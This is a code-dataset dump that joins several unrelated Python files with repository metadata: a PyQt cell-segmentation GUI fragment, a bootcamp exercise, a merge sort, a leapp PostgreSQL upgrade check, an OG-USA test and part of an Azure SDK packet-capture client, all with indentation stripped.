<p class="has-line-data" data-line-start="36" data-line-end="37"><strong>Segmentation options (2D only) </strong></p>
<p class="has-line-data" data-line-start="38" data-line-end="39">SIZE: you can manually enter the approximate diameter for your cells, or press “calibrate” to let the model estimate it. The size is represented by a disk at the bottom of the view window (can turn this disk of by unchecking “scale disk on”).</p>
<p class="has-line-data" data-line-start="40" data-line-end="41">use GPU: if you have specially installed the cuda version of mxnet, then you can activate this, but it won’t give huge speedups when running single images in the GUI.</p>
<p class="has-line-data" data-line-start="42" data-line-end="43">MODEL: there is a <em>cytoplasm</em> model and a <em>nuclei</em> model, choose what you want to segment</p>
<p class="has-line-data" data-line-start="44" data-line-end="45">CHAN TO SEG: this is the channel in which the cytoplasm or nuclei exist</p>
<p class="has-line-data" data-line-start="46" data-line-end="47">CHAN2 (OPT): if <em>cytoplasm</em> model is chosen, then choose the nuclear channel for this option</p>
''')
label = QtGui.QLabel(text)
label.setFont(QtGui.QFont("Arial", 8))
label.setWordWrap(True)
layout.addWidget(label, 0, 0, 1, 1)
self.show()
class TypeRadioButtons(QtGui.QButtonGroup):
def __init__(self, parent=None, row=0, col=0):
super(TypeRadioButtons, self).__init__()
parent.color = 0
self.parent = parent
self.bstr = self.parent.cell_types
for b in range(len(self.bstr)):
button = QtGui.QRadioButton(self.bstr[b])
button.setStyleSheet('color: rgb(190,190,190);')
if b==0:
button.setChecked(True)
self.addButton(button, b)
button.toggled.connect(lambda: self.btnpress(parent))
self.parent.l0.addWidget(button, row+b,col,1,2)
self.setExclusive(True)
#self.buttons.
def btnpress(self, parent):
b = self.checkedId()
self.parent.cell_type = b
class RGBRadioButtons(QtGui.QButtonGroup):
def __init__(self, parent=None, row=0, col=0):
super(RGBRadioButtons, self).__init__()
parent.color = 0
self.parent = parent
self.bstr = ["image", "flowsXY", "cellprob", "flowsZ"]
#self.buttons = QtGui.QButtonGroup()
self.dropdown = []
for b in range(len(self.bstr)):
button = QtGui.QRadioButton(self.bstr[b])
button.setStyleSheet('color: white;')
if b==0:
button.setChecked(True)
self.addButton(button, b)
button.toggled.connect(lambda: self.btnpress(parent))
self.parent.l0.addWidget(button, row+b,col,1,1)
self.setExclusive(True)
#self.buttons.
def btnpress(self, parent):
b = self.checkedId()
self.parent.view = b
if self.parent.loaded:
self.parent.update_plot()
class ViewBoxNoRightDrag(pg.ViewBox):
def __init__(self, parent=None, border=None, lockAspect=False, enableMouse=True, invertY=False, enableMenu=True, name=None, invertX=False):
pg.ViewBox.__init__(self, None, border, lockAspect, enableMouse,
invertY, enableMenu, name, invertX)
self.parent = parent
def mouseDragEvent(self, ev, axis=None):
## if axis is specified, event will only affect that axis.
if self.parent is None or (self.parent is not None and not self.parent.in_stroke):
ev.accept() ## we accept all buttons
pos = ev.pos()
lastPos = ev.lastPos()
dif = pos - lastPos
dif = dif * -1
## Ignore axes if mouse is disabled
mouseEnabled = np.array(self.state['mouseEnabled'], dtype=np.float)
mask = mouseEnabled.copy()
if axis is not None:
mask[1-axis] = 0.0
## Scale or translate based on mouse button
if ev.button() & (QtCore.Qt.LeftButton | QtCore.Qt.MidButton):
if self.state['mouseMode'] == pg.ViewBox.RectMode:
if ev.isFinish(): ## This is the final move in the drag; change the view scale now
#print "finish"
self.rbScaleBox.hide()
ax = QtCore.QRectF(Point(ev.buttonDownPos(ev.button())), Point(pos))
ax = self.childGroup.mapRectFromParent(ax)
self.showAxRect(ax)
self.axHistoryPointer += 1
self.axHistory = self.axHistory[:self.axHistoryPointer] + [ax]
else:
## update shape of scale box
self.updateScaleBox(ev.buttonDownPos(), ev.pos())
else:
tr = dif*mask
tr = self.mapToView(tr) - self.mapToView(Point(0,0))
x = tr.x() if mask[0] == 1 else None
y = tr.y() if mask[1] == 1 else None
self._resetTarget()
if x is not None or y is not None:
self.translateBy(x=x, y=y)
self.sigRangeChangedManually.emit(self.state['mouseEnabled'])
class ImageDraw(pg.ImageItem):
"""
**Bases:** :class:`GraphicsObject <pyqtgraph.GraphicsObject>`
GraphicsObject displaying an image. Optimized for rapid update (ie video display).
This item displays either a 2D numpy array (height, width) or
a 3D array (height, width, RGBa). This array is optionally scaled (see
:func:`setLevels <pyqtgraph.ImageItem.setLevels>`) and/or colored
with a lookup table (see :func:`setLookupTable <pyqtgraph.ImageItem.setLookupTable>`)
before being displayed.
ImageItem is frequently used in conjunction with
:class:`HistogramLUTItem <pyqtgraph.HistogramLUTItem>` or
:class:`HistogramLUTWidget <pyqtgraph.HistogramLUTWidget>` to provide a GUI
for controlling the levels and lookup table used to display the image.
"""
sigImageChanged = QtCore.Signal()
def __init__(self, image=None, viewbox=None, parent=None, **kargs):
super(ImageDraw, self).__init__()
#self.image=None
#self.viewbox=viewbox
self.levels = np.array([0,255])
self.lut = None
self.autoDownsample = False
self.axisOrder = 'row-major'
self.removable = False
self.parent = parent
#kernel[1,1] = 1
self.setDrawKernel(kernel_size=self.parent.brush_size)
self.parent.current_stroke = []
self.parent.in_stroke = False
def mouseClickEvent(self, ev):
if self.parent.masksOn or self.parent.outlinesOn:
if self.parent.loaded and (ev.button()==QtCore.Qt.RightButton or
ev.modifiers() == QtCore.Qt.ShiftModifier and not ev.double()):
if not self.parent.in_stroke:
ev.accept()
self.create_start(ev.pos())
self.parent.stroke_appended = False
self.parent.in_stroke = True
self.drawAt(ev.pos(), ev)
else:
ev.accept()
self.end_stroke()
self.parent.in_stroke = False
elif not self.parent.in_stroke:
y,x = int(ev.pos().y()), int(ev.pos().x())
if y>=0 and y<self.parent.Ly and x>=0 and x<self.parent.Lx:
if (ev.button()==QtCore.Qt.LeftButton and ev.modifiers()==QtCore.Qt.ControlModifier
and not ev.double()):
# delete mask selected
idx = self.parent.cellpix[self.parent.currentZ][y,x]
if idx > 0:
self.parent.remove_cell(idx)
elif ev.button()==QtCore.Qt.LeftButton and self.parent.masksOn:
idx = self.parent.cellpix[self.parent.currentZ][int(ev.pos().y()), int(ev.pos().x())]
if idx > 0:
self.parent.unselect_cell()
self.parent.select_cell(idx)
else:
self.parent.unselect_cell()
else:
ev.ignore()
return
def mouseDragEvent(self, ev):
ev.ignore()
return
def hoverEvent(self, ev):
QtWidgets.QApplication.setOverrideCursor(QtCore.Qt.CrossCursor)
if self.parent.in_stroke:
if self.parent.in_stroke:
# continue stroke if not at start
self.drawAt(ev.pos())
if self.is_at_start(ev.pos()):
self.end_stroke()
self.parent.in_stroke = False
else:
ev.acceptClicks(QtCore.Qt.RightButton)
#ev.acceptClicks(QtCore.Qt.LeftButton)
def create_start(self, pos):
self.scatter = pg.ScatterPlotItem([pos.x()], [pos.y()], pxMode=False,
pen=pg.mkPen(color=(255,0,0), width=self.parent.brush_size),
size=max(3*2, self.parent.brush_size*1.8*2), brush=None)
self.parent.p0.addItem(self.scatter)
def is_at_start(self, pos):
thresh_out = max(6, self.parent.brush_size*3)
thresh_in = max(3, self.parent.brush_size*1.8)
# first check if you ever left the start
if len(self.parent.current_stroke) > 3:
stroke = np.array(self.parent.current_stroke)
dist = (((stroke[1:,1:] - stroke[:1,1:][np.newaxis,:,:])**2).sum(axis=-1))**0.5
dist = dist.flatten()
#print(dist)
has_left = (dist > thresh_out).nonzero()[0]
if len(has_left) > 0:
first_left = np.sort(has_left)[0]
has_returned = (dist[max(4,first_left+1):] < thresh_in).sum()
if has_returned > 0:
return True
else:
return False
else:
return False
def end_stroke(self):
self.parent.p0.removeItem(self.scatter)
if not self.parent.stroke_appended:
self.parent.strokes.append(self.parent.current_stroke)
self.parent.stroke_appended = True
self.parent.current_stroke = np.array(self.parent.current_stroke)
ioutline = self.parent.current_stroke[:,3]==1
self.parent.current_point_set.extend(list(self.parent.current_stroke[ioutline]))
self.parent.current_stroke = []
if self.parent.autosave:
self.parent.add_set()
if len(self.parent.current_point_set) > 0 and self.parent.autosave:
self.parent.add_set()
def tabletEvent(self, ev):
pass
#print(ev.device())
#print(ev.pointerType())
#print(ev.pressure())
def drawAt(self, pos, ev=None):
mask = self.greenmask
set = self.parent.current_point_set
stroke = self.parent.current_stroke
pos = [int(pos.y()), int(pos.x())]
dk = self.drawKernel
kc = self.drawKernelCenter
sx = [0,dk.shape[0]]
sy = [0,dk.shape[1]]
tx = [pos[0] - kc[0], pos[0] - kc[0]+ dk.shape[0]]
ty = [pos[1] - kc[1], pos[1] - kc[1]+ dk.shape[1]]
kcent = kc.copy()
if tx[0]<=0:
sx[0] = 0
sx[1] = kc[0] + 1
tx = sx
kcent[0] = 0
if ty[0]<=0:
sy[0] = 0
sy[1] = kc[1] + 1
ty = sy
kcent[1] = 0
if tx[1] >= self.parent.Ly-1:
sx[0] = dk.shape[0] - kc[0] - 1
sx[1] = dk.shape[0]
tx[0] = self.parent.Ly - kc[0] - 1
tx[1] = self.parent.Ly
kcent[0] = tx[1]-tx[0]-1
if ty[1] >= self.parent.Lx-1:
sy[0] = dk.shape[1] - kc[1] - 1
sy[1] = dk.shape[1]
ty[0] = self.parent.Lx - kc[1] - 1
ty[1] = self.parent.Lx
kcent[1] = ty[1]-ty[0]-1
ts = (slice(tx[0],tx[1]), slice(ty[0],ty[1]))
ss = (slice(sx[0],sx[1]), slice(sy[0],sy[1]))
self.image[ts] = mask[ss]
for ky,y in enumerate(np.arange(ty[0], ty[1], 1, int)):
for kx,x in enumerate(np.arange(tx[0], tx[1], 1, int)):
iscent = np.logical_and(kx==kcent[0], ky==kcent[1])
stroke.append([self.parent.currentZ, x, y, iscent])
self.updateImage()
def setDrawKernel(self, kernel_size=3):
bs = kernel_size
kernel = np.ones((bs,bs), np.uint8)
self.drawKernel = kernel
self.drawKernelCenter = [int(np.floor(kernel.shape[0]/2)),
int(np.floor(kernel.shape[1]/2))]
onmask = 255 * kernel[:,:,np.newaxis]
offmask = np.zeros((bs,bs,1))
opamask = 100 * kernel[:,:,np.newaxis]
self.redmask = np.concatenate((onmask,offmask,offmask,onmask), axis=-1)
self.greenmask = np.concatenate((onmask,offmask,onmask,opamask), axis=-1)
class RangeSlider(QtGui.QSlider):
""" A slider for ranges.
This class provides a dual-slider for ranges, where there is a defined
maximum and minimum, as is a normal slider, but instead of having a
single slider value, there are 2 slider values.
This class emits the same signals as the QSlider base class, with the
exception of valueChanged
Found this slider here: https://www.mail-archive.com/pyqt@riverbankcomputing.com/msg22889.html
and modified it
"""
def __init__(self, parent=None, *args):
super(RangeSlider, self).__init__(*args)
self._low = self.minimum()
self._high = self.maximum()
self.pressed_control = QtGui.QStyle.SC_None
self.hover_control = QtGui.QStyle.SC_None
self.click_offset = 0
self.setOrientation(QtCore.Qt.Vertical)
#self.setTickPosition(QtGui.QSlider.TicksRight)
self.setStyleSheet(\
"QSlider::handle:vertical {\
background-color: cyan;\
border: 1px solid white;\
border-radius: 2px;\
border-color: white;\
height: 16px;\
width: 3px;\
margin: 8px 2; \
}")
#self.opt = QtGui.QStyleOptionSlider()
#self.opt.orientation=QtCore.Qt.Vertical
#self.initStyleOption(self.opt)
# 0 for the low, 1 for the high, -1 for both
self.active_slider = 0
self.parent = parent
def level_change(self):
if self.parent is not None:
if self.parent.loaded:
for z in range(self.parent.NZ):
self.parent.saturation[z] = [self._low, self._high]
self.parent.update_plot()
def low(self):
return self._low
def setLow(self, low):
self._low = low
self.update()
def high(self):
return self._high
def setHigh(self, high):
self._high = high
self.update()
def paintEvent(self, event):
# based on http://qt.gitorious.org/qt/qt/blobs/master/src/gui/widgets/qslider.cpp
painter = QtGui.QPainter(self)
style = QtGui.QApplication.style()
for i, value in enumerate([self._low, self._high]):
opt = QtGui.QStyleOptionSlider()
self.initStyleOption(opt)
# Only draw the groove for the first slider so it doesn't get drawn
# on top of the existing ones every time
if i == 0:
opt.subControls = QtGui.QStyle.SC_SliderHandle#QtGui.QStyle.SC_SliderGroove | QtGui.QStyle.SC_SliderHandle
else:
opt.subControls = QtGui.QStyle.SC_SliderHandle
if self.tickPosition() != self.NoTicks:
opt.subControls |= QtGui.QStyle.SC_SliderTickmarks
if self.pressed_control:
opt.activeSubControls = self.pressed_control
opt.state |= QtGui.QStyle.State_Sunken
else:
opt.activeSubControls = self.hover_control
opt.sliderPosition = value
opt.sliderValue = value
style.drawComplexControl(QtGui.QStyle.CC_Slider, opt, painter, self)
def mousePressEvent(self, event):
event.accept()
style = QtGui.QApplication.style()
button = event.button()
# In a normal slider control, when the user clicks on a point in the
# slider's total range, but not on the slider part of the control the
# control would jump the slider value to where the user clicked.
# For this control, clicks which are not direct hits will slide both
# slider parts
if button:
opt = QtGui.QStyleOptionSlider()
self.initStyleOption(opt)
self.active_slider = -1
for i, value in enumerate([self._low, self._high]):
opt.sliderPosition = value
hit = style.hitTestComplexControl(style.CC_Slider, opt, event.pos(), self)
if hit == style.SC_SliderHandle:
self.active_slider = i
self.pressed_control = hit
self.triggerAction(self.SliderMove)
self.setRepeatAction(self.SliderNoAction)
self.setSliderDown(True)
break
if self.active_slider < 0:
self.pressed_control = QtGui.QStyle.SC_SliderHandle
self.click_offset = self.__pixelPosToRangeValue(self.__pick(event.pos()))
self.triggerAction(self.SliderMove)
self.setRepeatAction(self.SliderNoAction)
else:
event.ignore()
def mouseMoveEvent(self, event):
if self.pressed_control != QtGui.QStyle.SC_SliderHandle:
event.ignore()
return
event.accept()
new_pos = self.__pixelPosToRangeValue(self.__pick(event.pos()))
opt = QtGui.QStyleOptionSlider()
self.initStyleOption(opt)
if self.active_slider < 0:
offset = new_pos - self.click_offset
self._high += offset
self._low += offset
if self._low < self.minimum():
diff = self.minimum() - self._low
self._low += diff
self._high += diff
if self._high > self.maximum():
diff = self.maximum() - self._high
self._low += diff
self._high += diff
elif self.active_slider == 0:
if new_pos >= self._high:
new_pos = self._high - 1
self._low = new_pos
else:
if new_pos <= self._low:
new_pos = self._low + 1
self._high = new_pos
self.click_offset = new_pos
self.update()
def mouseReleaseEvent(self, event):
self.level_change()
def __pick(self, pt):
if self.orientation() == QtCore.Qt.Horizontal:
return pt.x()
else:
return pt.y()
def __pixelPosToRangeValue(self, pos):
opt = QtGui.QStyleOptionSlider()
self.initStyleOption(opt)
style = QtGui.QApplication.style()
gr = style.subControlRect(style.CC_Slider, opt, style.SC_SliderGroove, self)
sr = style.subControlRect(style.CC_Slider, opt, style.SC_SliderHandle, self)
if self.orientation() == QtCore.Qt.Horizontal:
slider_length = sr.width()
slider_min = gr.x()
slider_max = gr.right() - slider_length + 1
else:
slider_length = sr.height()
slider_min = gr.y()
slider_max = gr.bottom() - slider_length + 1
return style.sliderValueFromPosition(self.minimum(), self.maximum(),
pos-slider_min, slider_max-slider_min,
opt.upsideDown)
| 42.042445
| 538
| 0.556112
|
135552180ceffcb58bc36685e806a055285d3a13
| 1,108
|
py
|
Python
|
module02/ex01/main.py
|
kotabrog/bootcamp_python
|
41251363d8f62d39451650dcd55e0c1522b1ddcb
|
[
"MIT"
] | null | null | null |
module02/ex01/main.py
|
kotabrog/bootcamp_python
|
41251363d8f62d39451650dcd55e0c1522b1ddcb
|
[
"MIT"
] | null | null | null |
module02/ex01/main.py
|
kotabrog/bootcamp_python
|
41251363d8f62d39451650dcd55e0c1522b1ddcb
|
[
"MIT"
] | null | null | null |
def what_are_the_vars(*args, **kwargs):
try:
obj = ObjectC()
attr_count = 0
for value in args:
setattr(obj, 'var_' + str(attr_count), value)
attr_count += 1
for key, value in kwargs.items():
if hasattr(obj, key):
raise Exception()
setattr(obj, key, value)
return obj
except Exception:
return None
class ObjectC(object):
def __init__(self):
pass
def doom_printer(obj):
if obj is None:
print("ERROR")
print("end")
return
for attr in dir(obj):
if attr[0] != '_':
value = getattr(obj, attr)
print("{}: {}".format(attr, value))
print("end")
if __name__ == "__main__":
obj = what_are_the_vars(7)
doom_printer(obj)
obj = what_are_the_vars("ft_lol", "Hi")
doom_printer(obj)
obj = what_are_the_vars()
doom_printer(obj)
obj = what_are_the_vars(12, "Yes", [0, 0, 0], a=10, hello="world")
doom_printer(obj)
obj = what_are_the_vars(42, a=10, var_0="world")
doom_printer(obj)
| 24.622222
| 70
| 0.554152
|
f4820bad6a46a7c4ed84a37547aab25e223253d8
| 1,276
|
py
|
Python
|
00.Basic_Data_Structure_and_Algorithms/Sortings/merge_sort.py
|
mr-beaver/CtCI-Exercises
|
f28a579ca0af110c43cb8b1451efd7786ac573ad
|
[
"MIT"
] | null | null | null |
00.Basic_Data_Structure_and_Algorithms/Sortings/merge_sort.py
|
mr-beaver/CtCI-Exercises
|
f28a579ca0af110c43cb8b1451efd7786ac573ad
|
[
"MIT"
] | null | null | null |
00.Basic_Data_Structure_and_Algorithms/Sortings/merge_sort.py
|
mr-beaver/CtCI-Exercises
|
f28a579ca0af110c43cb8b1451efd7786ac573ad
|
[
"MIT"
] | null | null | null |
'''
Implementation of Merge Sort
06/24/2018
Do NOT return an array every time and then combine them.
Use an empty and write the result into it to save space complexity.
'''
def mergeSort(arr):
if not len(arr):
return []
else:
result = [0] * len(arr)
split(arr, 0, len(arr) - 1, result)
return arr
def split(arr, low, high, result):
#single element, return do not change anything
if low >= high:
return
#multiple element, continue
else:
mid = (low + high) // 2
split(arr, low, mid, result)
split(arr, mid + 1, high, result)
merge(arr, low, mid, high, result)
for i in range(low, high + 1):
arr[i] = result[i]
print("low: {}, high: {}, result: {}".format(low, high, result))
def merge(arr, low, mid, high, result):
i = low
j = mid + 1
count = low
while i <= mid and j <= high:
if arr[i] < arr[j]:
result[count] = arr[i]
i += 1
else:
result[count] = arr[j]
j += 1
count += 1
while i <= mid:
result[count] = arr[i]
count += 1
i += 1
while j <= high:
result[count] = arr[j]
count += 1
j += 1
if __name__ == "__main__":
inputList = input('Please enter a list of integers separated by comma(,): ')
arr = [int(num) for num in inputList.split(',')]
print("The sorted result is {}".format(mergeSort(arr)))
| 20.918033
| 77
| 0.615204
|
74ece6285aad79304a4370b589c630218f913da8
| 3,680
|
py
|
Python
|
repos/system_upgrade/el7toel8/actors/postgresqlcheck/libraries/postgresqlcheck.py
|
winndows/leapp-repository
|
e4fd7c3fc14e5630b53998bfa3e4869d3e76cf4f
|
[
"Apache-2.0"
] | null | null | null |
repos/system_upgrade/el7toel8/actors/postgresqlcheck/libraries/postgresqlcheck.py
|
winndows/leapp-repository
|
e4fd7c3fc14e5630b53998bfa3e4869d3e76cf4f
|
[
"Apache-2.0"
] | 9
|
2020-01-27T14:20:59.000Z
|
2020-02-04T12:58:57.000Z
|
repos/system_upgrade/el7toel8/actors/postgresqlcheck/libraries/postgresqlcheck.py
|
winndows/leapp-repository
|
e4fd7c3fc14e5630b53998bfa3e4869d3e76cf4f
|
[
"Apache-2.0"
] | null | null | null |
from leapp import reporting
from leapp.libraries.common.rpms import has_package
from leapp.libraries.stdlib import api
from leapp.models import InstalledRedHatSignedRPM
# Summary for postgresql-server report
report_server_inst_summary = (
'PostgreSQL server component will be upgraded. Since RHEL-8 includes'
' PostgreSQL server 10 by default, which is incompatible with 9.2'
' included in RHEL-7, it is necessary to proceed with additional steps'
' for the complete upgrade of the PostgreSQL data.'
)
report_server_inst_hint = (
'Back up your data before proceeding with the upgrade'
' and follow steps in the documentation section "Migrating to a RHEL 8 version of PostgreSQL"'
' after the upgrade.'
)
# Link URL for postgresql-server report
report_server_inst_link_url = 'https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html-single/deploying_different_types_of_servers/index#migrating-to-a-rhel-8-version-of-postgresql_using-postgresql' # noqa: E501; pylint: disable=line-too-long
# List of dropped extensions from postgresql-contrib package
report_contrib_inst_dropext = ['dummy_seclabel', 'test_parser', 'tsearch2']
# Summary for postgresql-contrib report
report_contrib_inst_summary = (
'Please note that some extensions have been dropped from the'
' postgresql-contrib package and might not be available after'
' the upgrade:{}'
.format(''.join(['\n - {}'.format(i) for i in report_contrib_inst_dropext]))
)
def _report_server_installed():
"""
Create report on postgresql-server package installation detection.
Should remind user about present PostgreSQL server package
installation, warn them about necessary additional steps, and
redirect them to online documentation for the upgrade process.
"""
reporting.create_report([
reporting.Title('PostgreSQL (postgresql-server) has been detected on your system'),
reporting.Summary(report_server_inst_summary),
reporting.Severity(reporting.Severity.MEDIUM),
reporting.Tags([reporting.Tags.SERVICES]),
reporting.ExternalLink(title='Migrating to a RHEL 8 version of PostgreSQL',
url=report_server_inst_link_url),
reporting.RelatedResource('package', 'postgresql-server'),
reporting.Remediation(hint=report_server_inst_hint),
])
def _report_contrib_installed():
"""
Create report on postgresql-contrib package installation detection.
Should remind user about present PostgreSQL contrib package
installation and provide them with a list of extensions no longer
shipped with this package.
"""
reporting.create_report([
reporting.Title('PostgreSQL (postgresql-contrib) has been detected on your system'),
reporting.Summary(report_contrib_inst_summary),
reporting.Severity(reporting.Severity.MEDIUM),
reporting.Tags([reporting.Tags.SERVICES]),
reporting.RelatedResource('package', 'postgresql-contrib')
])
def report_installed_packages(_context=api):
"""
Create reports according to detected PostgreSQL packages.
Create the report if the postgresql-server rpm (RH signed) is installed.
Additionally, create another report if the postgresql-contrib rpm
is installed.
"""
has_server = has_package(InstalledRedHatSignedRPM, 'postgresql-server', _context)
has_contrib = has_package(InstalledRedHatSignedRPM, 'postgresql-contrib', _context)
if has_server:
# postgresql-server
_report_server_installed()
if has_contrib:
# postgresql-contrib
_report_contrib_installed()
| 40.888889
| 265
| 0.73913
|
0593a1620d2d00ae9772d61b767c62fc7cfd51ad
| 548
|
py
|
Python
|
ogusa/tests/test_parameter_tables.py
|
rkasher/OG-USA
|
220651fe7f444e66d838971288b10f6932f405fb
|
[
"CC0-1.0"
] | null | null | null |
ogusa/tests/test_parameter_tables.py
|
rkasher/OG-USA
|
220651fe7f444e66d838971288b10f6932f405fb
|
[
"CC0-1.0"
] | 5
|
2019-08-13T20:04:52.000Z
|
2019-11-16T23:10:48.000Z
|
ogusa/tests/test_parameter_tables.py
|
rkasher/OG-USA
|
220651fe7f444e66d838971288b10f6932f405fb
|
[
"CC0-1.0"
] | null | null | null |
'''
Tests of parameter_table.py module
'''
import pytest
import os
from ogusa import utils, parameter_tables
# Load in test results and parameters
CUR_PATH = os.path.abspath(os.path.dirname(__file__))
base_params = utils.safe_read_pickle(
os.path.join(CUR_PATH, 'test_io_data', 'model_params_baseline.pkl'))
base_taxfunctions = utils.safe_read_pickle(
os.path.join(CUR_PATH, 'test_io_data', 'TxFuncEst_baseline.pkl'))
def test_tax_rate_table():
str = parameter_tables.tax_rate_table(base_taxfunctions, base_params)
assert str
| 24.909091
| 73
| 0.775547
|
76bfb7cdb622df0668fe8744bcc618274a26ed2c
| 32,114
|
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_04_01/operations/_packet_captures_operations.py
|
LianwMS/azure-sdk-for-python
|
612d7bca9de86ee1bd1fa59291d7bf897ba9213f
|
[
"MIT"
] | 2
|
2019-05-17T21:24:53.000Z
|
2020-02-12T11:13:42.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_04_01/operations/_packet_captures_operations.py
|
LianwMS/azure-sdk-for-python
|
612d7bca9de86ee1bd1fa59291d7bf897ba9213f
|
[
"MIT"
] | 15
|
2019-07-12T18:18:04.000Z
|
2019-07-25T20:55:51.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_04_01/operations/_packet_captures_operations.py
|
LianwMS/azure-sdk-for-python
|
612d7bca9de86ee1bd1fa59291d7bf897ba9213f
|
[
"MIT"
] | 2
|
2020-05-21T22:51:22.000Z
|
2020-05-26T20:53:01.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PacketCapturesOperations(object):
"""PacketCapturesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _create_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
parameters, # type: "models.PacketCapture"
**kwargs # type: Any
):
# type: (...) -> "models.PacketCaptureResult"
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'PacketCapture')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PacketCaptureResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def begin_create(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
parameters, # type: "models.PacketCapture"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Create and start a packet capture on the specified VM.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param packet_capture_name: The name of the packet capture session.
:type packet_capture_name: str
:param parameters: Parameters that define the create packet capture operation.
:type parameters: ~azure.mgmt.network.v2020_04_01.models.PacketCapture
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either PacketCaptureResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_04_01.models.PacketCaptureResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
packet_capture_name=packet_capture_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('PacketCaptureResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.PacketCaptureResult"
"""Gets a packet capture session by name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param packet_capture_name: The name of the packet capture session.
:type packet_capture_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PacketCaptureResult, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_04_01.models.PacketCaptureResult
